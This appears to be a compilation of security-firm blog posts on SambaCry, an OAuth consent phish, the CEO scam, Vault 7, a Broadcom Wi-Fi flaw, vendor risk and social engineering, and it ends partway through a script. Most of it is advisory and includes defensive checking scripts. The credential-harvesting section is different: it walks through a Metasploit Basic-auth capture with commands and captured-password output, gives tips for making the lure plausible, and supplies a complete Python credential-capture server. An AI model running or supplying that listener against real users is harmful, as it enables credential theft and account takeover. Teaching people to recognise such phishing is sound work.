The more prudent approach, says Aghaian, is to focus resources on protecting your data—and prioritizing which data gets the most protection. “Isolate and identify your crown jewels,” says Aghaian, “Your chances of protecting that are far better than trying to protect everything.”

No matter how frustrating it can be to fend off cyberattacks, the risks of fighting back are significant. You have to identify the perpetrator. You have to figure out the best way to hack back. Whether or not the hack works, you could face retaliation. While the idea of hacking back is deeply satisfying, its risks remain greater than the potential reward.

Let's chat? Contact Us

Thank you PC World for the KB. 

SambaCry - Not just Windows Anymore !!

A seven-year-old critical remote code execution vulnerability has been discovered in the Samba networking software that could allow a remote attacker to take control of affected Linux and Unix machines.

Samba is open-source software (a re-implementation of the SMB networking protocol) that runs on most Unix-like operating systems, including Linux, UNIX, IBM System 390, and OpenVMS.

Samba allows non-Windows operating systems, such as GNU/Linux or Mac OS X, to share folders, files, and printers with Windows systems.

The newly discovered remote code execution vulnerability (CVE-2017-7494) affects every version from Samba 3.5.0, released on March 1, 2010, onwards.
"All versions of Samba from 3.5.0 onwards are vulnerable to a remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it," Samba wrote in an advisory published Wednesday.

According to the Shodan search engine, more than 485,000 Samba-enabled computers expose port 445 to the Internet, and according to researchers at Rapid7, more than 104,000 internet-exposed endpoints appeared to be running vulnerable versions of Samba, of which 92,000 are running unsupported versions.
Because Samba is the SMB protocol implementation for Linux and UNIX systems, some experts are calling this the "Linux version of EternalBlue," the exploit used by the WannaCry ransomware.
...or should I say SambaCry?

Given the number of vulnerable systems and how easy the flaw is to exploit, it could be exploited at scale by a worm.
Home networks with network-attached storage (NAS) devices could also be vulnerable.

The flaw resides in the way Samba handles shared libraries. A remote attacker can use this arbitrary module loading vulnerability (proof-of-concept code is public) to upload a shared library to a writable share and then cause the server to load and execute it, running the attacker's code with the privileges of the Samba daemon, which is typically root.
The vulnerability is trivially easy to exploit: a single line of code is enough to make the server load the uploaded library.


The Samba exploit has already been ported to Metasploit, a penetration testing framework, making it easy for researchers and attackers alike to exploit this flaw.

Patch and Mitigations

The Samba maintainers have already patched the issue in Samba 4.6.4, 4.5.10 and 4.4.14, and urge anyone running a vulnerable version to install the update as soon as possible.
If you cannot upgrade immediately, you can work around the vulnerability by adding the following line to the [global] section of your Samba configuration file, smb.conf:
nt pipe support = no

Once added, restart the SMB daemon (smbd). This setting blocks the named-pipe access the exploit relies on, but it also prevents some clients from fully using affected servers and disables functions that connected Windows systems expect, so treat it as a stopgap until you can patch.
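As an added check (example code written for this page, not Samba's own tooling), the script below parses an smb.conf for the two conditions the advisory combines, a share a client can write to and "nt pipe support" left at its default, and compares a Samba version string against the first fixed releases. The sample configuration is constructed; on a real host, feed it the output of `smbd -V` and the contents of /etc/samba/smb.conf.

```python
"""Added example: check a Samba host for CVE-2017-7494 exposure.

Not Samba's own code. It applies the conditions from the advisory:
a vulnerable version plus a share a client can write to, with the
'nt pipe support = no' workaround absent.
"""
import configparser
import re

FIRST_AFFECTED = (3, 5, 0)
# First fixed release on each supported branch (Samba advisory).
FIXED = {(4, 6): (4, 6, 4), (4, 5): (4, 5, 10), (4, 4): (4, 4, 14)}


def parse_version(text):
    """Extract (major, minor, patch) from e.g. 'Version 4.5.8'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError("no Samba version found in %r" % text)
    return tuple(int(x) for x in m.groups())


def is_vulnerable_version(text):
    """True if the version predates the fix on its branch.

    Branches older than 4.4 are end-of-life; upstream published source
    patches for them, but the version string does not change when such
    a patch is applied, so they are reported as vulnerable here.
    """
    v = parse_version(text)
    if v < FIRST_AFFECTED:
        return False
    branch = v[:2]
    if branch in FIXED:
        return v < FIXED[branch]
    return branch < (4, 4)


def _truthy(value):
    return value.strip().lower() in ("yes", "true", "1")


def analyse_smb_conf(text):
    """Return the writable shares and the nt pipe support setting.

    Samba's default is 'read only = yes', so a share is writable only if
    'writable'/'writeable'/'write ok' is set to yes or 'read only' to no;
    the last such line in a share wins, as in Samba itself.
    """
    cp = configparser.ConfigParser(strict=False, interpolation=None,
                                   inline_comment_prefixes=(";", "#"))
    cp.read_string(text)
    writable = []
    nt_pipe_support = True  # Samba default
    for section in cp.sections():
        if section.lower() == "global":
            nt_pipe_support = _truthy(cp.get(section, "nt pipe support", fallback="yes"))
            continue
        can_write = False
        for key, value in cp.items(section):
            key = " ".join(key.split())
            if key in ("writable", "writeable", "write ok"):
                can_write = _truthy(value)
            elif key == "read only":
                can_write = not _truthy(value)
        if can_write:
            writable.append(section)
    return {"writable_shares": writable, "nt_pipe_support": nt_pipe_support}


def assess(version_text, conf_text):
    """Return a list of findings; an empty list means no action needed."""
    findings = []
    if not is_vulnerable_version(version_text):
        return findings
    findings.append("vulnerable Samba version %s: upgrade to 4.6.4, 4.5.10 or 4.4.14 "
                    "(or your distribution's patched package)" % version_text.strip())
    conf = analyse_smb_conf(conf_text)
    if conf["writable_shares"] and conf["nt_pipe_support"]:
        findings.append("exploitable: writable share(s) %s with nt pipe support enabled; "
                        "set 'nt pipe support = no' in [global] and restart smbd until patched"
                        % ", ".join(conf["writable_shares"]))
    return findings


# Constructed sample configuration (not taken from a real host).
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   server string = file server
   ; the workaround would go here: nt pipe support = no

[public]
   path = /srv/samba/public
   read only = no
   guest ok = yes

[docs]
   path = /srv/samba/docs
   writable = yes
   valid users = @staff

[archive]
   path = /srv/samba/archive
   read only = yes
"""

if __name__ == "__main__":
    for finding in assess("Version 4.5.8", SAMPLE_SMB_CONF) or ["no findings"]:
        print(finding)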

While Linux distribution vendors, including Red Hat and Ubuntu, have already released patched versions for their users, the larger risk is NAS devices, whose owners may not update as quickly.

Craig Williams of Cisco said that given the fact that most NAS devices run Samba and have very valuable data, the vulnerability "has potential to be the first large-scale Linux ransomware worm."

Update: Samba maintainers have also provided patches for older, unsupported versions of Samba.
Meanwhile, Netgear released a security advisory for CVE-2017-7494, saying a large number of its router and NAS product models are affected by the flaw because they use Samba version 3.5.0 or later.
However, the company has so far released firmware fixes only for ReadyNAS products running OS 6.x.


Google Docs Phish is BACK !!


Recently there have been several phishing campaigns built around a shared "Google Doc". The goal of this phish is to have the end user grant a malicious third-party application access to their email contacts, messages, documents and settings. With that access the attacker emails the same link from your account to everyone in your contact list, who in turn pass the malicious content on to their contacts, and so on, so the campaign propagates on its own. Note that the message comes from a real account and the consent prompt is Google's own; the attacker never needs your password.


Be aware that Google no longer refers to its document storage service as Google Docs; the storage and sharing service is Google Drive, and Google Docs is the editor for documents stored there. Knowing how genuine Drive share notifications are worded improves your chances of spotting this phish.


Summary of details and what to look out for.

The email's FROM address is currently

This should be suspicious to any user who receives it. Be on the lookout for automated email sending services you are not subscribed to.

The sending servers are and

These services are used to send out email campaigns, mass mailings and marketing emails. They do not vet the intent of the emails they send.

The malicious link is

This is the link you are redirected to when you click the body of the email to open the "Google Doc".

The site is fronted by Cloudflare, a CDN and reverse-proxy service.

Behind the proxy, the attacker's origin server runs the malicious code and collects the data, and the proxy hides where that server actually is.

We at IDSS have obtained the source code and broken it down in detail. We feel that knowing how the malicious page's script works will help our audience build better security awareness.

First, let's discuss how it obtains access to your Google contacts and content.

When you click "Allow" at the consent prompt, confirming that the application may collect data from your account, it triggers the script below.

// Your Client ID can be retrieved from your project in the Google
// Developer Console,
var CLIENT_ID = '';
var CLIENT_ID_2 = '';

After this script runs, the redirect occurs.

First it builds the Google OAuth authorization URL with the first client ID:

var redirect_url = '' + encodeURIComponent(CLIENT_ID) + '&' + encodeURIComponent('') + '&customparam=customparam';

If the first attempt fails (for example because that OAuth client has been disabled), it falls back to a second client ID and URL:

var redirect_url_2 = '' + encodeURIComponent(CLIENT_ID_2) + '&' + encodeURIComponent('') + '&customparam=customparam';

var alert_url = '';

Next it checks that you confirmed access and that the authorization is established. The 'immediate' flag asks Google to return a token silently, without another prompt, if you have already consented.


function checkAuth() {
  gapi.auth.authorize({
    'client_id': CLIENT_ID,
    'scope': SCOPES.join(' '),
    'immediate': true
  }, handleAuthResult);
}

Now it collects your contacts, using the access token the application was just granted.


/**
 * Load Gmail API client library. List labels once client library
 * is loaded.
 */
function loadGmailApi() {
  // As captured: listContacts() is invoked immediately rather than passed as the callback.
  gapi.client.load('gmail', 'v1', listContacts());
}

/**
 * Print all Contacts in the authorized user's account. If no contacts
 * are found an appropriate message is printed.
 */
function listContacts()

To ensure that this is not reverse engineered, we will summarize the rest of the code in the following statement.

The rest of the code then sorts and organizes the collected information for storage and usage in the future. Just because you clicked the link today, doesn’t mean your contacts will get the email the same day. The attacker set a threshold timer to send out the emails on a rolling schedule.
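For anyone triaging a reported message, the added script below (written for this page, not part of the phishing kit) pulls apart the authorization URL such a kit builds in redirect_url and lists what the consent would hand over: the third-party client ID, the requested scopes, the host the token is sent to, and whether the implicit flow (response_type=token) is used, which delivers the access token straight to the attacker's page. The scope URIs are Google's published ones; the sample URL, its client ID and its redirect host are constructed.

```python
"""Added example: triage a Google OAuth authorization URL of the kind the
phishing kit builds. Not the kit's code. The scope names are Google's
published scope URIs; the sample URL below is constructed.
"""
from urllib.parse import urlparse, parse_qs

# Scopes that let an application read or send mail and read contacts:
# exactly what a consent phish needs to read your mailbox and spread.
SENSITIVE_SCOPES = {
    "https://mail.google.com/": "full Gmail access",
    "https://www.googleapis.com/auth/gmail.modify": "read and modify Gmail",
    "https://www.googleapis.com/auth/gmail.send": "send mail as you",
    "https://www.googleapis.com/auth/contacts": "read/write contacts",
    "https://www.googleapis.com/auth/contacts.readonly": "read contacts",
}


def parse_authorization_url(url):
    """Return the parts of an OAuth authorization request that matter."""
    u = urlparse(url)
    q = parse_qs(u.query)

    def first(key):
        return q.get(key, [""])[0]

    redirect = urlparse(first("redirect_uri"))
    return {
        "endpoint_host": u.hostname or "",
        "client_id": first("client_id"),
        "response_type": first("response_type"),
        "scopes": first("scope").split(),
        "redirect_host": redirect.hostname or "",
        "redirect_scheme": redirect.scheme,
    }


def triage(url, trusted_redirect_hosts):
    """Return findings for a reported consent URL (empty list: nothing notable).

    trusted_redirect_hosts: hostnames (e.g. your own domain) that a sanctioned
    integration would redirect to. The endpoint host is expected to be
    accounts.google.com: a consent phish abuses the legitimate login page,
    so that host is never a tell on its own.
    """
    info = parse_authorization_url(url)
    findings = []
    bad_scopes = [SENSITIVE_SCOPES[s] for s in info["scopes"] if s in SENSITIVE_SCOPES]
    if bad_scopes:
        findings.append("requests sensitive scopes: " + ", ".join(bad_scopes))
    if info["redirect_host"] and info["redirect_host"] not in trusted_redirect_hosts:
        findings.append("token/code is sent to untrusted host %s" % info["redirect_host"])
    if info["redirect_scheme"] and info["redirect_scheme"] != "https":
        findings.append("redirect is not https")
    if info["response_type"] == "token":
        findings.append("implicit flow: access token is handed to the redirect page directly")
    return findings


# Constructed sample: hypothetical client ID and redirect host, not real ones.
SAMPLE_URL = (
    "https://accounts.google.com/o/oauth2/auth"
    "?client_id=000000000000-example.apps.googleusercontent.com"
    "&redirect_uri=https%3A%2F%2Fdocs-share.example%2Fcallback"
    "&response_type=token"
    "&scope=https://www.googleapis.com/auth/contacts.readonly%20https://mail.google.com/"
)

if __name__ == "__main__":
    info = parse_authorization_url(SAMPLE_URL)
    print("client_id:", info["client_id"])
    for finding in triage(SAMPLE_URL, {"app.example.com"}):
        print("-", finding)
```

The client ID is the value worth recording: it identifies the attacker's application, it is what a user revokes under their Google account's third-party app permissions, and it is what an administrator blocks for the whole domain.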


If you think you may have been a victim of this phishing attempt, contact IDSS for assistance. As a first step, revoke the application's access under the third-party app permissions of your Google account; changing your password alone does not cancel a token you already granted.



CEO Scam - Are you aware? - Repost from March 2016

CEO Scam Emails - Reposted from March 2016


The Department of Homeland Security sends a clear message to business owners: make sure your company's cyber services are handled by qualified experts who can secure all devices, networks, and information.

Cyber attacks are prolific today, and, according to the FBI, serious, sophisticated cyber crime is a threat not only at the highest levels of our nation but also to individuals, companies of all sizes, and other organizations in the private and public sectors.

As your commercial insurance partner, Bearingstar's role is always to help you protect your business, your employees, your facilities, and, ultimately, the customers who use your products or services. A cyber attack can jeopardize the safety and reliability of all of these, so we want to offer you a series of four key cyber security tips that you, and your whole team, can put into practice today.

Cyber security tip #1: Start at the very top by preventing the CEO scam. According to the FBI, business email compromise (BEC), also called the "CEO scam," has emerged as a worldwide threat, costing companies billions of dollars globally. The CEO scam is a type of payment fraud that involves the compromise of legitimate business email accounts, often belonging to either the chief executive officer or the chief financial officer, for the purpose of carrying out unauthorized wire transfers.

You might think you and your employees are smart enough to outsmart a BEC attempt, but today's cyber criminals are much more savvy than the scammers of the past. These fraudsters first do a lot of research on you, other company executives, and your company. Then, to reduce the likelihood of raising suspicion, they use your organization's own language in the fraudulent email, request wire transfers in dollar amounts that appear legitimate, and gain access to email threads about billing and invoices.

The days of being alerted to a scam email by misspellings, poor grammar, or unusual phrases are long gone. And once a transfer takes place, the window of time to expose the scam and recoup your company's funds is very short.

It's crucial to make sure that you and your company do not fall victim to the CEO scam in the first place. IDSS recommends starting with the following five cyber security procedures:

1.   Set up a two-step verification process for payments, removing the ability for one person to authorize transfers on their own.
2.   Put strong controls in place over your bank accounts and consider whether your wire transfer dollar limits are too high.
3.   Review your transfer system's passwords for length and complexity, and use two-step authentication rather than just a username and password for login.
4.   Educate your employees, particularly those with access to company funds or the authority to send transfers, that requests for secrecy or pressure to act quickly should alert them to a scam.
5.   Meet with your financial institutions to put into effect the security services they offer.

The CEO scam is a relatively simple crime to commit, so it is likely to keep growing in popularity among cyber criminals. By putting in place processes with checks and balances for transfers or payments of any kind, you can strengthen the security of your company's internal processing systems and close your company's doors to fraudsters.

Cyber security 
source: mail-compromise


Contact IDSS for insight and training needs!

Credential Harvesting Exploit - All Browser

Have you ever been to a site that looks correct but something feels different? These are typically phishing sites that are used to collect your credentials. In 2017 several of these have been used to collect banking or email credentials. Yahoo was one of the major breaches that impacted millions of users across multiple email domains. Some examples are,, and others.

How do you prevent this? As a user you need to follow your instincts while on the web, the same as you do in real life. Protecting your usernames and passwords is critical to protecting yourself online. It is the same as if someone asked you in person for your social security number: you would not hand it over if you didn't know the source was trustworthy. Right?

When online, be cautious, be aware and protect your identity. Take the same precautions you use in real life for your personal safety.


With all that said, we at IDSS are detailing a credential harvesting technique that works against every browser. It is not a complicated exploit, but it is an efficient one, because its success depends on exploiting users rather than technology: the browser's own HTTP Basic authentication dialog asks for a username and password, and whatever is typed is sent to the server base64-encoded, not encrypted. Below is a quick tutorial on how the technique works and how it is configured.


--------- Credential Harvesting  ----------------

Start the module on a server or local system:

msf > use auxiliary/server/capture/http_basic

Review the module's options:

msf auxiliary(http_basic) > show options

Module options (auxiliary/server/capture/http_basic):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   REALM        Secure Site      yes       The authentication realm you'd like to present.
   RedirectURL                   no        The page to redirect users to after they enter basic auth creds
   SRVHOST      0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT      80               yes       The local port to listen on.
   SSL          false            no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                       no        The URI to use for this exploit (default is random)

Example settings (SRVHOST is the address of the listening system; URIPATH is left at its random default for this first run):

msf auxiliary(http_basic) > set SRVHOST 192.168.XX.XX
SRVHOST => 192.168.XX.XX
msf auxiliary(http_basic) > set RedirectURL /login
RedirectURL => /login

Start the listener:

msf auxiliary(http_basic) > exploit
[*] Auxiliary module execution completed

[*] Listening on 192.168.XX.XX:80...
[*] Using URL: http://192.168.XX.XX:80/f5vZqwKH
[*] Server started.

Example of captured credentials (the victim's browser showed a login dialog for the "Secure Site" realm, and whatever was typed arrived in the Authorization header):

msf auxiliary(http_basic) > [*] Sending 401 to client 192.168.XX.XX
[+] 192.168.XX.XX - Credential collected: "targets:t@rget" => /f5vZqwKH
[*] Redirecting client 192.168.XX.XX to /login

Cleaner option: set URIPATH to /login so the link looks plausible, and point RedirectURL at a real site.

msf auxiliary(http_basic) > exploit
[*] Auxiliary module execution completed

[*] Listening on 192.168.XX.XX:80...
[*] Using URL: http://192.168.XX.XX:80/login
[*] Server started.
msf auxiliary(http_basic) > [*] Sending 401 to client 192.168.XX.XX
[+] 192.168.XX.XX - Credential collected: "gotcha:Password1" => /login
[*] Redirecting client 192.168.XX.XX to

The second option redirects the user to a known site; in this example I used our IDSS front page. In a real credential harvesting campaign the redirect would go to the actual banking site, email login or other genuine website, so the victim lands where they expected and may never notice. Once the credentials have been collected the attacker needs nothing more from the victim and will use them to take over the account and exploit the victim's identity online.
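To show what the module is doing on the wire, the added code below (written for this page, not Metasploit's) implements the same exchange with the standard library: an unauthenticated request gets a 401 with a WWW-Authenticate: Basic challenge, the browser pops its login dialog, and the retry carries the credentials base64-encoded in the Authorization header, where the server decodes and logs them and answers with a redirect. The realm and redirect target are illustrative values. The decision logic lives in respond() so it can be exercised without sockets; serve() wraps it in http.server for a lab run on a system you are authorized to test.

```python
"""Added example: the HTTP Basic credential-capture exchange, in plain
Python. Not Metasploit's code. Basic auth is not encryption: the
Authorization header is base64 of 'user:password', so anyone who can
see a non-TLS request can read it, and any server that answers 401 can
make the browser ask for it.
"""
import base64
import binascii
from http.server import BaseHTTPRequestHandler, HTTPServer

REALM = "Secure Site"        # illustrative, mirrors the module's default
REDIRECT_URL = "/login"      # illustrative; a real phish points at the real site


def encode_basic(user, password):
    """What the browser sends back after the 401: base64 of 'user:password'."""
    return base64.b64encode(("%s:%s" % (user, password)).encode("utf-8")).decode("ascii")


def decode_basic(authorization):
    """Return (user, password) from an Authorization header value, or None."""
    if not authorization:
        return None
    scheme, _, blob = authorization.partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        raw = base64.b64decode(blob.strip(), validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    user, sep, password = raw.partition(":")   # password may itself contain ':'
    return (user, password) if sep else None


def respond(authorization, realm=REALM, redirect_url=REDIRECT_URL):
    """Decide the response to one request.

    Returns (status, headers, credentials): a 401 challenge when there is
    no usable Authorization header, otherwise a 302 to redirect_url with
    the captured (user, password).
    """
    creds = decode_basic(authorization)
    if creds is None:
        return 401, {"WWW-Authenticate": 'Basic realm="%s"' % realm}, None
    return 302, {"Location": redirect_url}, creds


CAPTURED = []  # (client address, user, password), like the module's log line


class CaptureHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        status, headers, creds = respond(self.headers.get("Authorization"))
        if creds:
            CAPTURED.append((self.client_address[0],) + creds)
            print("[+] %s - Credential collected: %r => %s"
                  % (self.client_address[0], "%s:%s" % creds, self.path))
        self.send_response(status)
        for name, value in headers.items():
            self.send_header(name, value)
        self.send_header("Content-Length", "0")
        self.end_headers()


def serve(host="127.0.0.1", port=8080):
    """Run the listener (lab use only, on systems you are authorized to test)."""
    HTTPServer((host, port), CaptureHandler).serve_forever()


if __name__ == "__main__":
    serve()
```

Nothing here needs a certificate, a look-alike page or any browser flaw: the dialog is the browser's own, which is why the technique works against every browser and why users should treat an unexpected login dialog on a plain http:// address with the same suspicion as a fake login page.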


Contact IDSS for training to prevent this exploit

More from Vault 7 - Project

As part of its Vault 7 series of leaked documents, the whistleblowing website WikiLeaks today released a new cache of 27 documents allegedly belonging to the US Central Intelligence Agency (CIA).

Named Grasshopper, the latest batch reveals a CLI-based framework developed by the CIA to build "customised malware" payloads for breaking into Microsoft Windows systems and bypassing antivirus protection.

The leaked documents are essentially a user manual that the agency marked "secret" and that was supposed to be accessible only to members of the agency, WikiLeaks claims.

Grasshopper: Customized Malware Builder Framework

According to the leaked documents, the Grasshopper framework allows agency operators to easily create custom malware tailored to technical details such as the operating system and antivirus product the target is using.

The Grasshopper framework then automatically puts together several components sufficient for attacking the target, and finally, delivers a Windows installer that the agency members can run on a target's computer and install their custom malware payloads.

    "A Grasshopper executable contains one or more installers. An installer is a stack of one or more installer components," the documentation reads. "Grasshopper invokes each component of the stack in series to operate on a payload. The ultimate purpose of an installer is to persist a payload."

The whistleblowing website claims the Grasshopper toolset was designed to go undetected even by anti-virus products from the world's leading vendors, including Kaspersky Lab, Symantec, and Microsoft.

CIA's Grasshopper Uses 'Stolen' Russian Malware

According to WikiLeaks, the CIA created the Grasshopper framework as a modern cyber-espionage solution not only to be as easy to use as possible but also "to maintain persistence over infected Microsoft Windows computers."

    "Grasshopper allows tools to be installed using a variety of persistence mechanisms and modified using a variety of extensions (like encryption)," Wikileaks said in the press release.

One of the so-called persistence mechanisms linked to Grasshopper is called Stolen Goods (Version 2), which shows how the CIA adapted known malware developed by cyber criminals across the world and modified it for its own uses.

One such malware is "Carberp," which is a malware rootkit developed by Russian hackers.

    "The persistence method and parts of the installer were taken and modified to fit our needs," the leaked document noted. "A vast majority of the original Carberp code that was used has been heavily modified. Very few pieces of the original code exist unmodified."

It is not yet clear how recently the CIA has used the hacking tools mentioned in the documentation, but WikiLeaks says the tools were used between 2012 and 2015.

So far, Wikileaks has revealed the "Year Zero" batch which uncovered CIA hacking exploits for popular hardware and software, the "Dark Matter" batch which focused on exploits and hacking techniques the agency designed to target iPhones and Macs, and the third batch called "Marble."

Marble revealed the source code of a secret anti-forensic framework, basically an obfuscator or a packer used by the CIA to hide the actual source of its malware.
Source: Swati Khandelwal, Hacking News


Contact IDSS to assist in Mitigation

Mobile Devices are Vulnerable - Broadcom

In addition to our earlier Bluetooth hacking proof-of-concept post, IDSS has details of a vulnerability that impacts iOS and Android users over Wi-Fi, with no user interaction required.


A broad array of Android phones are vulnerable to attacks that use booby-trapped Wi-Fi signals to achieve full device takeover, a researcher has demonstrated.


The vulnerability resides in a widely used Wi-Fi chipset manufactured by Broadcom and used in both iOS and Android devices. Apple patched the vulnerability with Monday's release of iOS 10.3.1. "An attacker within range may be able to execute arbitrary code on the Wi-Fi chip," Apple's accompanying advisory warned. In a highly detailed blog post published Tuesday, the Google Project Zero researcher who discovered the flaw said it allowed the execution of malicious code on a fully updated Nexus 6P "by Wi-Fi proximity alone, requiring no user interaction."


Google is in the process of releasing an update in its April security bulletin. The fix is available only to a select number of device models, and even then it can take two weeks or more to be available as an over-the-air update to those who are eligible. Company representatives didn't respond to an e-mail seeking comment for this post.


The proof-of-concept exploit developed by Project Zero researcher Gal Beniamini uses Wi-Fi frames that contain irregular values. The values, in turn, cause the firmware running on Broadcom's wireless system-on-chip to overflow its stack. By using the frames to target timers responsible for carrying out regularly occurring events such as performing scans for adjacent networks, Beniamini managed to overwrite specific regions of device memory with arbitrary shellcode. Beniamini's code does nothing more than write a benign value to a specific memory address. Attackers could obviously exploit the same series of flaws to surreptitiously execute malicious code on vulnerable devices within range of a rogue access point.


Basic mitigations missing


Besides the specific stack overflow bugs exploited by the proof-of-concept attack, Beniamini said a lack of security protections built into many software and hardware platforms made the Broadcom chipset a prime target.


"We’ve seen that while the firmware implementation on the Wi-Fi SoC is incredibly complex, it still lags behind in terms of security," he wrote. "Specifically, it lacks all basic exploit mitigations—including stack cookies, safe unlinking and access permission protection (by means of [a memory protection unit.])"


The Broadcom chipset contains an MPU, but the researcher found that it's implemented in a way that effectively makes all memory readable, writeable, and executable. "This saves us some hassle," he wrote. "We can conveniently execute our code directly from the heap." He said that Broadcom has informed him that newer versions of the chipset implement the MPU more effectively and also add unspecified additional security mechanisms.


Given the severity of the vulnerability, people with affected devices should install a patch as soon as it's available. For those with vulnerable iPhones, that's easy enough. As is all too often the case for Android users, there's no easy way to get a fix immediately, if at all. That's because Google continues to stagger the release of its monthly patch bundle for the minority of devices that are eligible to receive it.


At the moment, it's not clear if there are effective workarounds available for vulnerable devices. Turning off Wi-Fi is one possibility, but as revealed in recent research into an unrelated Wi-Fi-related weakness involving Android phones, devices often relay Wi-Fi frames even when Wi-Fi is turned off. This post will be updated if word of a better workaround emerges.


Contact us at IDSS to help you mitigate this RISK !!

Protecting your data from your 3rd party Vendors!

What do you need to do to protect you from your vendors?

In recent years, 63 percent of breaches were traced to third-party vendors, according to Soha Systems' survey on third-party risk management. Witness a 2015 attack (discovered only in early 2016) on a large fast food restaurant chain. Through the login credentials of a third-party service provider, hackers were able to gain access to the point-of-sale system used by more than 1,000 franchise restaurants, leading to the exposure of customers’ credit card information. Other recent high-profile breaches resulting from third-party compromises include large discount chain stores, pharmacies and medical centers.

On average, organizations spent $10 million responding to third-party breaches over the previous 12 months, according to a May 2016 Ponemon report. But organizational risk isn’t limited just to direct revenue loss. Reputational impacts, regulatory exposure and lawsuits can cause lasting damage and lead to job losses for executives, directors and others in the organization.

Gauging vendors’ risks

A deep understanding of the cybersecurity capabilities of your vendors and contractors is critical to protecting devices and data, counsels the AT&T Cybersecurity Insights report. Organizations can begin by requiring third parties to complete detailed questionnaires about their security practices, be open to security audits and even conduct penetration tests to help assess the strength of their cyberdefenses. How an organization then folds vendor assessments into its own security profile is determined by size:

Small or medium-size organizations: Request each vendor to provide a security assessment report that lists the security controls they have in place and the last time they performed a security review.

Large organizations: Include the risk assessment of all vendors in the organization’s master risk register.

For all organizations, security assessments should be ongoing. A variety of third-party monitoring services are available that can further help lessen your exposure to third-party-based breaches.

Strengthening your security profile

With an assessment of your vendors’ security capabilities in hand, you can move on to implementing a robust third-party management program. Best practices to include:

Third-party security management begins at the top. The CEO and boards of directors should be involved in overseeing strategy and ensuring employees are educated on vendor cybersecurity.

Not all vendors need the same level of access to your network. Determine their data needs and assign privilege levels, from least to highest, based on their assessed risk profile; the default should be the least access that lets them do the job, and nothing more.

The IoT and cloud require additional considerations. Understand the level of threat from third parties’ use of the IoT and cloud and implement strategies to reduce those risks.

Know your third parties’ details. Maintain a current register of each of your vendors that includes their contact information and the information they can access.

All organizations need to recognize that partners and other third party entities may be a weak link in their overall security regimes. But by taking the necessary precautions to keep hackers from exploiting trusted relationships, you can reduce your exposure to the vast majority of cyberattacks.

Carin Hughes is an editor of the AT&T Cybersecurity Insights reports.

So what do you do?  Ask them the right questions! Then keep them honest with audits and reports. 

1. How do you take raw data from the network and correlate events to determine whether an attack is under way? 

2. May I see the resumes of the staffers who will be working on my account?

3. Do you have references from companies that are the same size as my company, in the same industry or in the same area? 

4. How will you charge for services out of scope? 

5. How will communications between organizations be managed? 

6. What processes will be used to control access to devices and logs? 

7. What auditing is in place for access/change control and reporting? 

8. Do you provide phone or in-person support for security incident remedies? 

9. What are your disaster recovery safeguards? 

10. How does the MSSP protect the data-center cloud environment? 

Contact IDSS

We will provide you with the solutions and expertise to manage this relationship.


Social Engineering and Counter Measures

What is social engineering?

Social engineering is the art of manipulating users of a computing system into revealing confidential information that can be used to gain unauthorized access to that system. The term also covers activities such as exploiting human kindness, greed and curiosity to get into restricted buildings or to get users to install backdoor software.

A social engineering attack typically proceeds in the following stages:

Gather Information: This is the first stage; the attacker learns as much as he can about the intended victim. The information is gathered from company web sites, other publications and sometimes by talking to the users of the target system.

Plan Attack: The attacker outlines how he or she intends to execute the attack.

Acquire Tools: These include the computer programs the attacker will use when launching the attack.

Attack: Exploit the weaknesses in the target system.

Use acquired knowledge: Information gathered during the social engineering stage, such as pet names or the birthdates of the organization's founders, is used in attacks such as password guessing.


Common Social Engineering Techniques:

Social engineering techniques can take many forms. The following is the list of the commonly used techniques.


Familiarity Exploit: Users are less suspicious of people they are familiar with. An attacker can make himself familiar to the users of the target system before the actual attack: joining them at meals or smoke breaks, turning up at social events and so on. Suppose the users work in a building that requires an access code or card to get in; the attacker follows them as they enter, and they are likely to hold the door open for a familiar face. The attacker can also casually ask for answers to questions such as where you met your spouse or the name of your high school math teacher. Users are likely to answer because they trust the familiar face, and that information can be used to take over email and other accounts that ask the same questions when a password is forgotten.


Intimidating Circumstances: People tend to avoid those who intimidate others around them. Using this technique, the attacker may stage a heated argument on the phone or with an accomplice, then ask users for information that would compromise the security of their system. Users are likely to give the correct answers just to avoid a confrontation with the attacker. The same technique can be used to avoid being checked at a security checkpoint.


Phishing: This technique uses trickery and deceit to obtain private data from users. The social engineer may imitate a genuine website such as Yahoo and ask the unsuspecting user to confirm their account name and password. The same technique is used to collect credit card details or any other valuable personal data.


Tailgating: This technique involves following users as they enter restricted areas. As a human courtesy, the user is likely to let the social engineer into the restricted area.


Exploiting human curiosity: The social engineer deliberately drops a malware-infected flash drive where users can easily pick it up. A user who finds it is likely to plug it into a computer to see what is on it.


Exploiting human greed: The social engineer lures the user with promises of making a lot of money online if they fill in a form and confirm their details, including credit card details.


Social Engineering Counter Measures


Most techniques employed by social engineers involve manipulating human biases. To counter such techniques, an organization can;


To counter the familiarity exploit, the users must be trained to not substitute familiarity with security measures. Even the people that they are familiar with must prove that they have the authorization to access certain areas and information.


To counter intimidating circumstances attacks, users must be trained to identify social engineering techniques that fish for sensitive information and politely say no.


To counterphishing techniques, most sites such as yahoo use secure connections to encrypt data and prove that they are who they claim to be. Checking the URL may help you spot fake sites. Avoid responding to emails that request you to provide personal information.


To counter tailgating attacks, users must be trained not to let others use their security clearance to gain access to restricted areas. Each user must use their own access clearance.


To counter human curiosity, it’s better to submit picked up flash disks to system administrators who should scan them for viruses or other infection preferably on an isolated machine.


To counter techniques that exploit human greed, employees must be trained on the dangers of falling for such scams.
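The phishing countermeasure above says to check the URL. Below is an added example, written for this page and not part of the original article, of what "checking the URL" means in practice: it pulls the real hostname out of a link and reports the tricks phishers use to make a foreign host look like a trusted one (trusted name as a prefix of a longer domain, a username before '@', a raw IP address, punycode or non-ASCII lookalikes, plain HTTP). The TRUSTED set and the sample links are assumptions constructed for the demo.

```python
"""Added example for this page: a URL sanity check that catches the common
phishing tricks the countermeasure above warns about.  It is not code from the
original article.  TRUSTED is an assumption: the set of domains the user
genuinely uses; everything else is treated as untrusted."""
import ipaddress
from urllib.parse import urlsplit

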